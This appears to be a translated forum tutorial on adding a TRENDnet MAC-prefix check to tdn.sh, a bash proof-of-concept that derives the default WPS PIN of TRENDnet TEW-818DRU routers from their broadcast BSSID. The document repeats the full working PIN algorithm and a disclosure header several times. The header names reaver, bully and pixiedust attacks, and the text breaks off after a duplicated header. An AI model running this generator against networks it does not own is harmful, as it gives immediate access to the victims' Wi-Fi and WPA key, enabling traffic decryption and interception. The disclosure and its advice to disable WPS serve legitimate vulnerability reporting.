The eminent lord d1k0w0ns suggests a contribution to the bash code "tdn.sh" (tdn.sh: PIN generator for TRENDnet TEW-818DRU v1 (ac1900) and v2 (ac3200)).
Quick reminder of what tdn.sh does: the script asks the user to enter the BSSID of the 2.4 GHz Wi-Fi network and prints the PIN on screen after applying the algorithm.
If we set aside the functions dedicated to generating the PIN, it is as simple as it gets.
Sir d1k0w0ns's idea is to add a "control condition" to the script that warns the user when the MAC does not belong to TRENDnet.
Let's get to it!
First we have to find the part we want to modify.
We strip the credits from the script and are left with this:
############################################## SCRIPT (read comments for explanation about algorithm) #######
NOcolor="\033[0;37m" # colors are set as variables
red="\033[1;31m"
purpple="\033[0;35m"
yellow="\033[1;33m"
white="\033[1;37m"
victorycolor="\033[1;43m"
ALGORITHM(){
###############################
# The algorithm can be divided in three steps. The first two steps are done in this function and the third one is done by the other function called "CHECKSUM()"
# 1) The first step in the algorithm consists in reversing the order of the last three bytes of the 2.4 GHz (b/g/n) BSSID to get a string (defined in this code as the variable "$SCRAMBLEDNIC")
# example: if the 2.4 GHz BSSID is 00:90:4C:10:E4:D2 the string created would be D2E410 (value for $SCRAMBLEDNIC)
SCRAMBLEDNIC=$(printf `echo $BSSID | awk -F':' '{ print $6 }'``echo $BSSID | awk -F':' '{ print $5 }'``echo $BSSID | awk -F':' '{ print $4 }'`) # with awk using ":" as a separator we grab the last three bytes of the MAC in reverse order
# 2) Once this string is defined it has to be converted from hexadecimal to decimal. In the code the result is saved in the variable "$CONVERTEDMAC". A reduction modulo 10000000 keeps only the last 7 digits, saved in the variable $STRING (the zero padding is done later, in CHECKSUM)
CONVERTEDMAC=$(printf '%d\n' 0x$SCRAMBLEDNIC) # conversion from hexadecimal to decimal
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # drops the leading digit if the number is longer than 7 digits
# The PIN body is generated; we just have to add the WPS checksum to create a full valid WPS PIN with the function "CHECKSUM"
}
CHECKSUM(){ # The checksum function was written by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # shift left to make room for the 8th digit of the WPS PIN
ACCUM=0 # running weighted sum of the digits
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # To generate it we multiply the first digit of the PIN by 3
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` # The second digit by one
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` # The third digit by three
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` # etc...
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # ... we are done and all the results are summed up in $ACCUM
DIGIT=`expr $ACCUM '%' 10` # we define our check digit: the sum reduced modulo 10 to its units digit
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to "10 minus check digit", modulo 10
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case the value of the PIN is under 10000000
}
######################################################POC START HERE######################################################
echo -e "
$yellow .----------------. .----------------. .-----------------.
$yellow| .--------------. || .--------------. || .--------------. |
$yellow| |$red _________ $yellow | || |$red ________ $yellow | || |$red ____ _____$yellow | |
| |$red | _ _ |$yellow | || |$red |_ ___ .$yellow | || |$red|_ \|_ _|$yellow | |
| |$red |_/ | | \_|$yellow | || |$red | | . \ $yellow| || |$red | \ | |$yellow | |
| |$red | | $yellow | || |$red | | | | $yellow| || |$red | |\ \| |$yellow | |
| |$red _| |_ $yellow | || |$red _| |___.' / $yellow| || |$red _| |_\ |_ $yellow | |
| |$red |_____| $yellow | || |$red |________.' $yellow| || |$red|_____|\____|$yellow | |
| | | || | | || | | |
| '--------------' || '--------------' || '--------------' |$white.sh$yellow
'----------------' '----------------' '----------------'
$purpple DEFAULT PIN GENERATOR FOR$yellow TRENDNET$red TEW-818DRU$white VERSION.1$NOcolor ($red ac1900 $NOcolor)
$purpple AND$yellow TRENDNET$red TEW-818DRU$white VERSION.2$NOcolor ($red ac3200 $NOcolor)
GPL.3 code by$yellow kcdtv$NOcolor for
$red www.wifi-libre.com $yellow www.crack-wifi.com$NOcolor"
echo -e "$NOcolor"
echo -e " -------------------------------------"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID # bssid is introduced as a variable
echo -e "$NOcolor"
while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
do # filter for checking the conformity bssid with loop over condition thanks to antares ;)
echo -e " $red Error :$white MAC No Conforme $NOcolor"
echo -e "$yellow*$NOcolor You must enter the full 2.4 ghz bSSID in hexadecimal format
(ex:$red 00:90:4C:10:E4:D2$NOcolor )"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID
echo -e "$NOcolor"
done
OUICHECK=$(echo $BSSID | tr a-f A-F | awk -F':' '{ print $1 $2 $3 }') # first three bytes (OUI) in upper case, without colons
if [[ $OUICHECK != 0014D1 ]] && [[ $OUICHECK != D8EB97 ]] ; # neither of the two OUIs listed for TRENDnet matches
then
echo -e "$red warning$NOcolor : This MAC address does not belong to$white TRENDnet$NOcolor"
fi
ALGORITHM # function that scrambles the NIC part of the BSSID and converts it from hexadecimal to decimal
CHECKSUM # function that generates the correct WPS checksum and gives the full default WPS PIN for the TEW-818DRU
echo -e "
$white The default$red PIN$white for 5ghz and 2,4ghz network is $victorycolor$PIN$NOcolor
$NOcolor for support visit$yellow www.wifi-libre.com$NOcolor
"
exit 0
In a script the functions are usually placed at the beginning.
They cannot be placed after the point where they are invoked in the code: if they are not defined before they are executed, they do not exist and nothing happens.
We see that at the beginning of the script, already stripped of the credits, we have two functions:
1. ALGORITHM (the algorithm; it is of no interest for the mod, so we take it out)
out:
ALGORITHM(){
###############################
# The algorithm can be divided in three steps. The first two steps are done in this function and the third one is done by the other function called "CHECKSUM()"
# 1) The first step in the algorithm consists in reversing the order of the last three bytes of the 2.4 GHz (b/g/n) BSSID to get a string (defined in this code as the variable "$SCRAMBLEDNIC")
# example: if the 2.4 GHz BSSID is 00:90:4C:10:E4:D2 the string created would be D2E410 (value for $SCRAMBLEDNIC)
SCRAMBLEDNIC=$(printf `echo $BSSID | awk -F':' '{ print $6 }'``echo $BSSID | awk -F':' '{ print $5 }'``echo $BSSID | awk -F':' '{ print $4 }'`) # with awk using ":" as a separator we grab the last three bytes of the MAC in reverse order
# 2) Once this string is defined it has to be converted from hexadecimal to decimal. In the code the result is saved in the variable "$CONVERTEDMAC". A reduction modulo 10000000 keeps only the last 7 digits, saved in the variable $STRING (the zero padding is done later, in CHECKSUM)
CONVERTEDMAC=$(printf '%d\n' 0x$SCRAMBLEDNIC) # conversion from hexadecimal to decimal
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # drops the leading digit if the number is longer than 7 digits
# The PIN body is generated; we just have to add the WPS checksum to create a full valid WPS PIN with the function "CHECKSUM"
}
2. CHECKSUM: computes the WPS checksum, which does not concern us now either, out:
CHECKSUM(){ # The checksum function was written by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # shift left to make room for the 8th digit of the WPS PIN
ACCUM=0 # running weighted sum of the digits
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # To generate it we multiply the first digit of the PIN by 3
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` # The second digit by one
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` # The third digit by three
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` # etc...
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # ... we are done and all the results are summed up in $ACCUM
DIGIT=`expr $ACCUM '%' 10` # we define our check digit: the sum reduced modulo 10 to its units digit
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to "10 minus check digit", modulo 10
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case the value of the PIN is under 10000000
}
Then the script itself starts, and the first thing that comes is the welcome screen, out as well:
######################################################POC START HERE######################################################
echo -e "
$yellow .----------------. .----------------. .-----------------.
$yellow| .--------------. || .--------------. || .--------------. |
$yellow| |$red _________ $yellow | || |$red ________ $yellow | || |$red ____ _____$yellow | |
| |$red | _ _ |$yellow | || |$red |_ ___ .$yellow | || |$red|_ \|_ _|$yellow | |
| |$red |_/ | | \_|$yellow | || |$red | | . \ $yellow| || |$red | \ | |$yellow | |
| |$red | | $yellow | || |$red | | | | $yellow| || |$red | |\ \| |$yellow | |
| |$red _| |_ $yellow | || |$red _| |___.' / $yellow| || |$red _| |_\ |_ $yellow | |
| |$red |_____| $yellow | || |$red |________.' $yellow| || |$red|_____|\____|$yellow | |
| | | || | | || | | |
| '--------------' || '--------------' || '--------------' |$white.sh$yellow
'----------------' '----------------' '----------------'
$purpple DEFAULT PIN GENERATOR FOR$yellow TRENDNET$red TEW-818DRU$white VERSION.1$NOcolor ($red ac1900 $NOcolor)
$purpple AND$yellow TRENDNET$red TEW-818DRU$white VERSION.2$NOcolor ($red ac3200 $NOcolor)
GPL.3 code by$yellow kcdtv$NOcolor for
$red www.wifi-libre.com $yellow www.crack-wifi.com$NOcolor"
echo -e "$NOcolor"
And we are left with these lines, which are the script:
I have divided it into steps; what we are going to do now is add a piece of code between step 2 and step 3.
That is: once we have the BSSID entered (1) and have checked the validity of its length and format (2), we add a second check, this time on the start of the BSSID, to know whether the MAC corresponds to one openly assigned to TRENDnet or not.
And then we generate the PIN: what was step 3 becomes step 4.
To keep it easy I will use very simple syntax and a derivative of the for loop that makes life easier: case ... in.
As we see in the code, the variable we are going to use is BSSID:
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID # bssid is introduced as a variable
It holds the whole BSSID.
Type this in a console and press enter:
read -n 17 -ep " pon el bssid aquí: " BSSID
and then run
echo $BSSID
and the whole BSSID appears exactly as you entered it.
So as not to go crazy debugging on the fly to get everything on one line, we will go step by step with simple commands.
The first thing is to define a new variable for the check we will perform later, a variable that holds the first half of the BSSID.
To trim text with bash we can use the cut command (see the bash course for details).
In the same console, now enter
echo $BSSID | cut -c -9
and we get the first part of the BSSID:
About the line of code used:
The pipe (|) lets us chain two commands. What is produced on the left of the pipe is sent as input to what is on the right: the output of "echo $BSSID" is thus processed by the cut command.
The cut command is used with the -c (characters) argument, which counts characters.
I defined the cut as -9, with the dash before the 9 so that it is interpreted as "cut up to the ninth character". If you write the cut command like this: cut -c 9- you get the end of the BSSID instead, because the dash is after the 9.
OK?
So let's define a new variable, which we will call "OUI", that stores the beginning of the BSSID (up to character number 8, to get something like XX:XX:XX):
OUI=$( echo $BSSID | cut -c -8 )
Now the check itself.
If I remember correctly, "case" is essentially a construction based on the for loop.
It does not matter much; what matters is what it is for:
case: executes one or more command lists depending on the value of a variable.
Bash (IV) - Estructuras de control y bucles (control structures and loops)
And that is exactly what we want to do: condition the course of the script according to the start of the BSSID that we have stored in the variable $OUI.
The basic form of a case ... esac statement is:
case expresion in
caso_1 )
comandos;;
caso_2 )
comandos;;
......
esac
We start with case <our variable> in to define the variable that will be used for the check,
which gives us
case $OUI in
Then we define our first case. Here we pick one of the two known BSSID prefixes for TRENDnet. One of them is D8:EB:97
case $OUI in
D8:EB:97 )
And then the command to execute if the value of $OUI is the one defined (D8:EB:97, which surely belongs to TRENDnet). In this case we will just say in the console with echo that the MAC is good. Note the ;; which is a closing instruction to say that we have finished writing commands for the first case.
case $OUI in
D8:EB:97 )
echo " OUI Check : The mac address belongs to Trendnet"
;;
And we can add as many cases as we want. When we have finished adding the cases we must close the case statement with the closing keyword.
By way of example:
case $OUI in
D8:EB:97 )
echo " OUI-Check : The mac address belongs to Trendnet"
;;
esac
Now, we could add a million conditions to cover every possible BSSID prefix, or simplify.
First, we know two MAC prefixes for TRENDnet.
Instead of adding another case that says the same thing (the MAC is correct) for the other MAC prefix, we can include the second value in our first case.
This is done with the "|" symbol (the "pipe", which in this context means "or").
So our "case esac" statement covers both values in a single case:
case $OUI in
D8:EB:97 | 00:14:D1 )
echo " OUI-Check : The mac address belongs to Trendnet"
;;
esac
And to cover all the other cases (a MAC that is not TRENDnet's) we use a little star *, which means... everything else,
with an error message this time...
case $OUI in
D8:EB:97 | 00:14:D1 )
echo " OUI-Check : The mac address belongs to Trendnet"
;;
* )
echo "ERROR : OUI-Check Failed! The mac address of the device does not belong to TRENDnet!"
;;
esac
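As an added example (not code from the thread or from tdn.sh), here is the same OUI check packaged as a POSIX shell function with return codes: it first applies the format filter tdn.sh uses, then upper-cases the hex digits so a lower-case BSSID still matches, then runs the case statement on the two prefixes the thread names. It is phrased for an administrator auditing their own access points, where a match is the cue to verify that WPS is really disabled; the names normalize_bssid, valid_bssid, oui_check and describe_bssid are chosen here.

```bash
#!/bin/sh
# Added example, not part of tdn.sh: the OUI check as a reusable shell function.
# Exit status of oui_check: 0 = OUI listed for TRENDnet in this thread,
#                           1 = some other vendor, 2 = malformed BSSID.
# Function names (normalize_bssid, valid_bssid, oui_check, describe_bssid)
# are chosen for this example.

# Upper-case the hex digits so that d8:eb:97:... and D8:EB:97:... compare equal.
normalize_bssid() {
    printf '%s' "$1" | tr 'a-f' 'A-F'
}

# Same format filter tdn.sh applies: six hex bytes separated by colons.
valid_bssid() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

oui_check() {
    bssid=$(normalize_bssid "$1")
    valid_bssid "$bssid" || return 2
    oui=$(printf '%s' "$bssid" | cut -c -8)   # first three bytes: "XX:XX:XX"
    case "$oui" in
        D8:EB:97 | 00:14:D1)                    # the two OUIs the thread lists for TRENDnet
            return 0 ;;
        *)
            return 1 ;;
    esac
}

# One line per BSSID, phrased for an administrator auditing their own APs.
describe_bssid() {
    rc=0
    oui_check "$1" || rc=$?
    case $rc in
        0) echo "$1: TRENDnet OUI - verify that WPS is disabled on this AP" ;;
        1) echo "$1: OUI not in the TRENDnet list" ;;
        *) echo "$1: malformed BSSID, expected XX:XX:XX:XX:XX:XX" ;;
    esac
}

# Constructed sample input (not real devices): one BSSID for each outcome.
for b in "d8:eb:97:12:34:56" "00:14:D1:AA:BB:CC" "00:90:4C:10:E4:D2" "D8EB971234"; do
    describe_bssid "$b"
done
```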
We only have to insert this code between steps 2 and 3... I add some colours and a few line breaks for style.
Here you have the whole modified code:
########################################################################################################
# Title of the breach : Full disclosure of default PIN algorithm with PoC (tdn.sh) for TRENDnet TEW-818RDU v.1 ("ac1900") and v.2 ("ac3200")
# Credits : kcdtv
# Originally disclosed the 29th of June 2014 for the first version of TEW-818RDU (ac1900) in www.crack-wifi.com
# Link : http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# Fully disclosed the 25th of June 2015 for version 1 and 2 (ac3200) with PoC bash code (tdn.sh) in www.wifi-libre.com
# Link : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
################################################### AFFECTED DEVICE ##########################################################
# TEW-818DRU version 1 (ac1900) : A dual-band access point manufactured by TRENDnet - you can check the administration interface here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
# TEW-818DRU version 2 (ac3200) : The latest revision of this router, the fastest router manufactured by TRENDnet, tri-band - you can check the administration interface here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
################################################### DESCRIPTION OF THE BREACH #################################################
### DANGEROUS WPS SETTINGS
# The two versions use the same kind of (bad) WPS settings
# * WPS in PIN mode is activated by default
# * It has a PIN enabled that is not configurable. A static PIN.
# * This non-configurable PIN is also unique : it is used by all the networks (2.4 and 5 GHz bands)
# It is already a bad configuration, with the possibility to brute force the hashes from the M3 ("pixiedust" attack) or to perform a classical brute force of the PIN itself with reaver or bully
#### BSSID BASED ALGORITHM REVERSED
# It is the second half of the 2.4 GHz BSSID (NIC) that is used to generate this unique, non-configurable and activated PIN
# The BSSID is broadcast and can be gathered with a simple wireless scan
# Instead of using - as has been done with many other devices including some older TRENDnet devices - a straightforward hexadecimal to decimal conversion of this portion of the BSSID to generate the PIN, the TRENDnet crew "updated" the concept by swapping the first and the last byte of the string before conversion. My English is "so-so" so let's take a very simple example to illustrate it
### STEP 1
# Grab the BSSID of the 2.4 GHz network, as an example we will take 00:00:00:11:22:33
### STEP 2
# Grab the second half (NIC portion) of this BSSID. That would be 11:22:33 in our example
### STEP 3
# Swap the last and first byte of this string. It gives us 33:22:11
### STEP 4
# Convert from hexadecimal to decimal. It gives us 3351057
### STEP 5
# Generate the WPS checksum to get the full PIN. If the number obtained previously is greater than 9999999 you will have to drop the leading digit to get a 7 digit long string. If the value is below 1000000 you will have to perform some zero-padding until you get a 7 digit long string. In our example we get the PIN 33510576.
# See the annotated script tdn.sh for more details.
################################################## SEVERITY ##################################################################
# A person within the Wi-Fi range of the router can get access to both the 5 GHz and 2.4 GHz networks immediately by sending the correct PIN. He will also obtain the WPA key, which could be used to perform much more intrusive actions (decrypt traffic, MITM...)
################################################# SOLUTION ##################################################################
# Risks are very high, but luckily it is very simple to secure the Wi-Fi network by disabling WPS in the configuration interface
# As a recommendation for your safety: - do not use WPS and make sure that it is absolutely disabled in every mode
# - you should install DD-WRT on these devices instead of the original firmware
################################################### TIMELINE ##################################################################
# 16-06-2014 : I noticed the weak algorithm by visiting the TRENDnet emulator for this device (see link in "AFFECTED DEVICE")
# 17-06-2014 : I wrote to TRENDnet to ask them if the data in the web interface are correct and if the algorithm I found is the one really used
# 29-06-2014 : No answer from TRENDnet so I published my study in crack-wifi.com http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# February 2015 : I found some data on the web that confirmed the use of this algorithm : https://www.youtube.com/watch?v=HyfIX1B8cx0
# 25-06-2015 : One year later and with the newest version affected, I decided to fully disclose the breach with a PoC script, tdn.sh : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
############################################### CREDITS ###############################################################
# kcdtv
############################################### WEBSITE(s) ############################################################
# www.wifi-libre.com
# www.crack-wifi.com
############################################ HOW TO USE THIS POC ############################################
# Save this text in a blank document that you can call tdn.sh
# Open a terminal in the folder where you saved the script (cd or right click + open terminal here)
# Launch the script from the shell with :
# bash tdn.sh
# Enter the full BSSID of the 2.4 GHz network in hexadecimal format (ex : 00:90:4C:0F:F4:D2) and press enter
############################################## SCRIPT (read comments for explanation about algorithm) #######
#!/bin/bash
#################################################### LEGAL ADVISORY ####################################################################
# tdn.sh copyleft 25th June 2015 :
# This script is released under the General Public License version 3 from the Free Software Foundation.
# This package is distributed in the hope that it will be useful, but without any warranty; it can be used, modified and shared but must be referenced according to GPL v3 terms
# It CANNOT be sold or used for a commercial-economical purpose.
# See for more details about GPL v3 : http://gplv3.fsf.org/
NOcolor="\033[0;37m" # colors are set as variables
red="\033[1;31m"
purpple="\033[0;35m"
yellow="\033[1;33m"
white="\033[1;37m"
victorycolor="\033[1;43m"
ALGORITHM(){
###############################
# The algorithm can be divided in three steps. The first two steps are done in this function and the third one is done by the other function called "CHECKSUM()"
# 1) The first step in the algorithm consists in reversing the order of the last three bytes of the 2.4 GHz (b/g/n) BSSID to get a string (defined in this code as the variable "$SCRAMBLEDNIC")
# example: if the 2.4 GHz BSSID is 00:90:4C:10:E4:D2 the string created would be D2E410 (value for $SCRAMBLEDNIC)
SCRAMBLEDNIC=$(printf `echo $BSSID | awk -F':' '{ print $6 }'``echo $BSSID | awk -F':' '{ print $5 }'``echo $BSSID | awk -F':' '{ print $4 }'`) # with awk using ":" as a separator we grab the last three bytes of the MAC in reverse order
# 2) Once this string is defined it has to be converted from hexadecimal to decimal. In the code the result is saved in the variable "$CONVERTEDMAC". A reduction modulo 10000000 keeps only the last 7 digits, saved in the variable $STRING (the zero padding is done later, in CHECKSUM)
CONVERTEDMAC=$(printf '%d\n' 0x$SCRAMBLEDNIC) # conversion from hexadecimal to decimal
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # drops the leading digit if the number is longer than 7 digits
# The PIN body is generated; we just have to add the WPS checksum to create a full valid WPS PIN with the function "CHECKSUM"
}
CHECKSUM(){ # The checksum function was written by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # shift left to make room for the 8th digit of the WPS PIN
ACCUM=0 # running weighted sum of the digits
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # To generate it we multiply the first digit of the PIN by 3
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` # The second digit by one
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` # The third digit by three
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` # etc...
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # ... we are done and all the results are summed up in $ACCUM
DIGIT=`expr $ACCUM '%' 10` # we define our check digit: the sum reduced modulo 10 to its units digit
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to "10 minus check digit", modulo 10
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case the value of the PIN is under 10000000
}
######################################################POC START HERE######################################################
echo -e "
$yellow .----------------. .----------------. .-----------------.
$yellow| .--------------. || .--------------. || .--------------. |
$yellow| |$red _________ $yellow | || |$red ________ $yellow | || |$red ____ _____$yellow | |
| |$red | _ _ |$yellow | || |$red |_ ___ .$yellow | || |$red|_ \|_ _|$yellow | |
| |$red |_/ | | \_|$yellow | || |$red | | . \ $yellow| || |$red | \ | |$yellow | |
| |$red | | $yellow | || |$red | | | | $yellow| || |$red | |\ \| |$yellow | |
| |$red _| |_ $yellow | || |$red _| |___.' / $yellow| || |$red _| |_\ |_ $yellow | |
| |$red |_____| $yellow | || |$red |________.' $yellow| || |$red|_____|\____|$yellow | |
| | | || | | || | | |
| '--------------' || '--------------' || '--------------' |$white.sh$yellow
'----------------' '----------------' '----------------'
$purpple DEFAULT PIN GENERATOR FOR$yellow TRENDNET$red TEW-818DRU$white VERSION.1$NOcolor ($red ac1900 $NOcolor)
$purpple AND$yellow TRENDNET$red TEW-818DRU$white VERSION.2$NOcolor ($red ac3200 $NOcolor)
GPL.3 code by$yellow kcdtv$NOcolor for
$red www.wifi-libre.com $yellow www.crack-wifi.com$NOcolor"
echo -e "$NOcolor"
echo -e " -------------------------------------"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID # bssid is introduced as a variable
echo -e "$NOcolor"
while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
do # filter for checking the conformity bssid with loop over condition thanks to antares ;)
echo -e " $red Error :$white MAC No Conforme $NOcolor"
echo -e "$yellow*$NOcolor You must enter the full 2.4 ghz bSSID in hexadecimal format
(ex:$red 00:90:4C:10:E4:D2$NOcolor )"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID
echo -e "$NOcolor"
done
######### update July the 1st of 2015 for dk10v and the "wireless X" project :D #####################################################
# This part of the code checks whether the MAC address belongs to TRENDnet or not
OUI=$( echo $BSSID | tr a-f A-F | cut -c -8 ) # We grab the first half of the BSSID, upper-cased so a lower-case input still matches, and store the value in $OUI
case $OUI in
D8:EB:97 | 00:14:D1 )
echo -e " $purpple OUI-CHECK :$white The MAC address belongs to TRENDnet"
;;
* )
echo -e " $red OUI-CHECK FAILED! $white The MAC address does not belong to TRENDnet"
;;
esac
ALGORITHM # function that scrambles the NIC part of the BSSID and converts it from hexadecimal to decimal
CHECKSUM # function that generates the correct WPS checksum and gives the full default WPS PIN for the TEW-818DRU, credits to antares_145
echo -e "
$white The default$red PIN$white for the 5 GHz and 2.4 GHz networks is $victorycolor$PIN$NOcolor
$NOcolor for support visit$yellow www.wifi-libre.com$NOcolor
"
exit 0
This was the idea, plus a line reporting the MACs.
I don't know whether it would be better to put "trendnet macs" or "vulnerable macs".
I leave the code here with the vulnerable MACs visible and the addition of fluorescent green in the colours section.
Just 3 lines added.
############
############################################################################################
# Title of the breach : Full disclosure of default PIN algorithm with PoC (tdn.sh) for TRENDnet TEW-818RDU v.1 ("ac1900") and v.2 ("ac3200")
# Credits : kcdtv
# Originaly disclosed the 29th june 2014 for the first version of TEW-818RDU (ac1900) in www.crack-wifi.com
# Link : http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# Fully disclosed the 25th of june 2015 for version 1 and 2 (ac3200) with PoC bash code (tdn.sh) in www.wifi-libre.com
# Link : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
################################################### AFFECTED DEVICE ##########################################################
# TEW-818DRU version 1 (ac1900) : A dual-band access point manufactured by TRENDnet - you can check the administration interface here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
# TEW-818DRU version 2 (ac3200) : The last revision of this router, the fastest router manufactured by TRENDnet with trial-band - you can check the administration interface here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
################################################### DESCRIPTION OF THE BREACH #################################################
### DANEGEROUS WPS SETTINGS
# The two versions use the same kind of (bad) WPS settings
# * The WPS in PIN mode is activated by default
# * It has a PIN enabled that is not configurable. A static PIN.
# * This non configurable PIN is also unique : it is used by all the networks (2.4 and 5 Ghz bands)
# It is already a bad configuration whith the possibility tu brute force the hahses from the M3 ("pixiedust" attack) or tu perform a classical brute force of the PIN itself with reaver or bully
#### BSSID BASED ALGORITHM REVERSED
# It is the second half of the 2.4 Ghz bSSID (NIC) that is used to generate this unique, non-configurable and activated PIN
# The bSSID is broadcasted and can be gathered with a simple wireless scan
# Instead of using - as it has been done with many other devices including some older trendnet devices - a straightforward hexadecimal to decimal conversion of this portion of the bssid to generate the PIN; The trendnet crew "updated" the concept by inverting the first and the last byte of the string before conversion. My english is "so-so" so let's take a very simple example to illustrate it
### STEP 1
# Grab the the bSSID of the 2.4 ghz network, as an example we will take 00:00:00:11:22:33
### STEP 2
# Grab the second half (NIC portion) of this bSSID. That would be 11:22:33 in our example
### STEP 3
# Invert the last and first byte of this string. It gives us 33:22:11
### STEP 4
# Convert from hexadecimal to decimal. It gives us 3351057
### STEP 5
# Generate the WPS checksum to get the full PIN. If the string obtained previously is superior to 9999999 you will have to take away the superior unity to get a 7 digit length string. If the string value is inferior to 1000000 you will have to perform some zero-padding until you get a 7 digit long string. In our example we get the PIN 33510576.
#See the annotated script tdn.sh for more details.
################################################## SEVERITY ##################################################################
# A person within the wifi area of the router can get access to both 5Ghz and 2.4Ghz networks immediately by sending the correct PIN. He will also have the WPA key that could be used in order to perform much more intrusive actions (decrypt traffic, MITM...)
################################################# SOLUTION ##################################################################
# Risks are very high but it is by chance very simple to secure the WiFi network by disabling the WPS in the configuration interface
# As a recommendation for your safety: - do not use the WPS and be sure that it is absolutely disabled in every mode
# - you should install DD-WRT in this devices instead of the original firmware
################################################### TIMELINE ##################################################################
# 16-06-2014 : I noticed the weak algorithm by visiting trendnet emulator for this device (see link in "AFFECTED DEVICE")
# 17-06-2014 : I wrote to Trendnet to ask them if the data in the web interface are correct and if the algorithm I found is the one really used
# 29-06-2014 : No answer from trendnet so I published my study in crack-wifi.com http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# february 2015 : I found on the web some data that confirmed the use of this algorithm : https://www.youtube.com/watch?v=HyfIX1B8cx0
# 25-06-2015 : One year later, and with the newest version affected, I decided to fully disclose the breach with a PoC script, tdn.sh : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
############################################### CREDITS ###############################################################
# kcdtv
############################################### WEBSITE(s)#############################################################
# www.wifi-libre.com
# www.crack-wifi.com
############################################ HOW TO USE THIS POC ############################################
# Save this text in a blank document that you can call tdn.sh
# open a terminal in the folder where you saved the script (cd or right click + open terminal here )
# Launch the script from the shell with :
# bash tdn.sh
# Enter the full bSSID of the 2.4 Ghz network in hexadecimal format (ex : 00:90:4C:0F:F4:D2 ) and press enter
############################################## SCRIPT (read comments for explanation about the algorithm) #######
#!/bin/bash
#################################################### LEGAL ADVISORY ####################################################################
